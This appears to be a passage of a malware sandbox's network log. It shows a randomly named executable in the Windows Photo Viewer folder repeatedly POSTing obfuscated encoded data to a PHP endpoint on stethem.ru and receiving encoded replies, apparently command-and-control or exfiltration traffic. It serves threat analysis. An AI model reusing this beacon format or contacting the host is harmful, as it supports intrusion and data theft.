Dec 28, 2024 22:18:59.203747034 CET	1072	OUT	Data Raw: 5f 5b 58 54 5e 41 51 57 5c 57 57 56 5a 5e 54 50 55 56 59 59 55 53 57 59 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _[XT^AQW\WWVZ^TPUVYYUSWYZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:) ?=&%,0_0$,#)7\898$=(P"#$%*'>,![",\-.
Dec 28, 2024 22:18:59.936306000 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:00.171462059 CET	796	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MnOZcbXKEcYbIN98r7Jz7ArR60B%2F7z5hyEegs3BI0S%2B9MMgiBYWKki8vdtcuVzaQorwSFPNeRPoZC%2BRCSPY1tg1p%2BONboYjMxawvUVOjWOotO7fP6yTMs0K5Ez%2Bj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f949607a91942b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4445&min_rtt=1756&rtt_var=6037&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=62736&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49765	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:00.881139994 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:01.234962940 CET	1072	OUT	Data Raw: 5a 5f 5d 50 5e 42 51 52 5c 57 57 56 5a 5b 54 5a 55 57 59 51 55 56 57 52 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z_]P^BQR\WWVZ[TZUWYQUVWRZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:=0?+>'?4'$#',$0(Q"#*X&C=0;![",\-:
Dec 28, 2024 22:19:01.965178967 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:02.199708939 CET	793	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D1Oru5BWyrEjwPoqAO81l9Rp5GV6fiHEC%2BzbOrETuDKl4daSkrZGaZ3%2B6nd2lszvNvWE87Iu5hFDiesgvPfKLq09iQ0tQpMx5pwCL%2FuBMcCrqxzqqe09UHbuFHmL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94961459d2de9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6436&min_rtt=1489&rtt_var=10454&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=35548&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49766	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:02.445694923 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:02.799388885 CET	1072	OUT	Data Raw: 5f 5b 5d 53 5e 45 51 50 5c 57 57 56 5a 54 54 53 55 55 59 50 55 53 57 52 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _[]S^EQP\WWVZTTSUUYPUSWRZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9^>0<_<>-X%/737<4_7Y.) '[0R! .\&=$8!-<![",\-
Dec 28, 2024 22:19:03.623440027 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49767	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:03.769473076 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:04.130139112 CET	1788	OUT	Data Raw: 5f 59 58 54 5b 47 54 50 5c 57 57 56 5a 59 54 50 55 57 59 59 55 55 57 5a 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _YXT[GTP\WWVZYTPUWYYUUWZZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:)#0<>*2,0''\ :'\,+$-/!02&6$2,,![",\-2
Dec 28, 2024 22:19:04.886641979 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:05.134057999 CET	945	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2FRKBpxNX59jPSlds2OJPZaOQcTa753MHkNdcw6ZFq3XAJN333zxHpVlZN5Y3Pv53Xtbzkcz%2FIyx2ndN2KZ1XGovH5it%2FcOAe5Bupdfjyrggz1kfDKs%2FUCG8b%2Fq0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f949626884c4213-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4063&min_rtt=1813&rtt_var=5180&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2111&delivery_rate=73677&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 22 12 23 1b 0b 08 22 55 2d 1f 24 07 22 14 28 19 20 02 28 30 2d 5f 27 00 3f 0e 2a 0d 37 08 30 17 2d 07 24 3d 3e 56 30 02 00 13 25 03 28 51 06 12 22 1c 21 06 30 0d 2d 04 2b 5e 25 33 32 09 21 3d 21 10 27 17 0f 18 31 5e 36 05 36 39 2b 1a 3b 14 2e 0e 29 3a 28 43 3f 0f 32 59 20 11 2e 57 02 13 27 51 2b 07 3f 51 35 0f 15 10 27 3b 33 16 21 2f 25 53 30 3a 2a 57 20 2d 09 5f 3e 02 24 14 23 09 27 54 3d 29 37 58 21 38 24 57 3c 29 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"#"U-$"( (0-_'?70-$=>V0%(Q"!0-+^%32!=!'1^669+;.):(C?2Y .W'Q+?Q5';3!/%S0:W -_>$#'T=)7X!8$W<)"U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49768	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:04.497790098 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:04.844532013 CET	1072	OUT	Data Raw: 5f 5e 58 53 5e 44 51 52 5c 57 57 56 5a 55 54 5a 55 56 59 5b 55 55 57 5c 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _^XS^DQR\WWVZUTZUVY[UUW\ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9)+==5Z1<$$4#+_,#3>8"#%&9$8*/<![",\-
Dec 28, 2024 22:19:05.628463984 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:05.875762939 CET	797	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BPISBPi%2BdS41026gXUkr7bDbIplrmO%2BWzsIj731cc7%2F8JJXWH5IXuyYVPeo5tjhhCifysPgt8WVZWkLtMXDqD7ZL4MqQn%2FG1Q4sVcKV1iEX4LH8iNmVHRiVZcHAA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94962b29b30fa3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2800&min_rtt=1489&rtt_var=3182&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=121839&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49769	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:06.316191912 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:06.672892094 CET	1072	OUT	Data Raw: 5a 58 5d 53 5e 47 54 53 5c 57 57 56 5a 5a 54 53 55 53 59 59 55 5c 57 5d 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZX]S^GTS\WWVZZTSUSYYU\W]ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9\*<>X&0$3] 0,)#3=#36_2=$86-,![",\-
Dec 28, 2024 22:19:07.399946928 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:07.635663986 CET	789	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FoMjSPRXccs35in5lnqXGxlJwWus89HCdC%2FjHk8AawzTah7VTio5sKPb6zFQxB0lMWEUyWpomz0tNMIOEDHAOrjlc8cEZXoTLSjsx3eC0gnKQb0RvbV2jGDVWaLV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9496364ddff5f4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3019&min_rtt=1635&rtt_var=3381&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=114897&cwnd=102&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49770	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:07.887212992 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:08.235209942 CET	1072	OUT	Data Raw: 5a 58 58 56 5b 44 51 57 5c 57 57 56 5a 5a 54 54 55 55 59 50 55 50 57 5a 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZXXV[DQW\WWVZZTTUUYPUPWZZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:>3^+X%+3?[")4,;$/".$5"0(9^;![",\-
Dec 28, 2024 22:19:09.061162949 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:09.314224005 CET	794	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ky35G%2FuotjcFZdjv%2FbFNGDKr%2BUBa0YtZEmIgmPpjH0VUWCxliM7dlY8TkjIBzwEgR7mUDdiKX2ypE406UFYHDoBwpQXru%2FJvZPEgBFBbP8uSVpccYf0KLMXmBosb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94964099f64392-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3541&min_rtt=1609&rtt_var=4468&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=85545&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49772	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:09.554275036 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:09.907098055 CET	1072	OUT	Data Raw: 5f 5f 5d 56 5b 45 54 53 5c 57 57 56 5a 5f 54 52 55 55 59 5a 55 5d 57 52 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: __]V[ETS\WWVZ_TRUUYZU]WRZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9\)3 +>2;$4^#+;'3P#0-156A3";![",\-*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49774	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:10.265620947 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1760 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:10.622230053 CET	1760	OUT	Data Raw: 5f 5b 58 54 5e 44 54 5d 5c 57 57 56 5a 5b 54 56 55 57 59 5f 55 53 57 53 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _[XT^DT]\WWVZ[TVUWY_USWSZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9)?.!1?<[0^"9;)/3. P5U6X%%:'_,<![",\-:
Dec 28, 2024 22:19:11.397407055 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:11.641290903 CET	938	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFOfSNcK4pLr29kwaQxQU14lRBqed%2F89n8u1kXbEPnDPuvsulrWnP66xmzBtTLLtalL8MmFq4mvlFzrzy22LZzxLdUEaVaY7eoQsx10jgv7jD9z10lifv5zANU84"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94964f38868c05-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6812&min_rtt=1970&rtt_var=10422&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2083&delivery_rate=35866&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 21 09 23 0b 3e 1d 22 55 29 11 26 39 2d 09 2b 19 33 59 2b 30 21 5b 30 07 01 0c 29 0a 30 18 30 5f 39 06 30 10 25 09 24 2f 2e 1c 31 03 28 51 06 12 21 08 22 2c 2f 10 39 03 23 5c 24 33 3e 06 21 2d 13 11 30 29 26 08 25 3b 22 03 23 29 01 15 2f 3a 35 57 29 00 3f 1e 28 31 07 02 20 2b 2e 57 02 13 24 0a 2b 07 3b 51 22 32 3c 01 33 06 2f 5f 35 3f 04 09 33 2a 31 0d 23 13 23 5e 29 3f 20 58 37 27 02 0a 29 00 34 02 20 2b 24 55 2b 39 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98!#>"U)&9-+3Y+0![0)00_90%$/.1(Q!",/9#\$3>!-0)&%;"#)/:5W)?(1 +.W$+;Q"2<3/_5?3*1##^)? X7')4 +$U+9"U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49775	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:10.385689974 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:10.735045910 CET	1072	OUT	Data Raw: 5a 5d 5d 51 5b 44 54 5c 5c 57 57 56 5a 58 54 5b 55 5b 59 5b 55 52 57 5d 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z]]Q[DT\\WWVZXT[U[Y[URW]ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:,(.',0/Z7;\,),',R"0.%5-3;<![",\-6
Dec 28, 2024 22:19:11.469860077 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:11.703802109 CET	788	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hxacvvlzYb8%2BYWfyg3XQX4ahfgNAscFHicXj4XZMa9H0YiYe1MNvJmzMNKGBOX8vl8fUhhiVLuCHr51x7LwU4iVjOkMrq8DTBkTv6twzloN7eHOUmbxaEsDdzN0M"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94964fbaff18bc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3971&min_rtt=1469&rtt_var=5555&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=67948&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49782	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:13.160377026 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:13.516786098 CET	1072	OUT	Data Raw: 5f 5e 5d 54 5b 40 54 5d 5c 57 57 56 5a 5e 54 53 55 52 59 5e 55 52 57 53 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _^]T[@T]\WWVZ^TSURY^URWSZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9Y)#(61<8_'#_798:8Z$[8!U5%5:D$=;<![",\-.
Dec 28, 2024 22:19:14.245529890 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:14.483347893 CET	792	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ytGarT5c6J%2BF2SA0jC%2BE5AUD%2B3lg4zvZjdv5ya1sv83IJpmpliY9DvpCNzAXokaxfF7qsH12cyTs97p6lr66wcvaDrnjA0OSXnDojSFy36O5u1TbeDDM4gCtsItS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9496611ad2f5f7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4741&min_rtt=1595&rtt_var=6891&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=54542&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49788	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

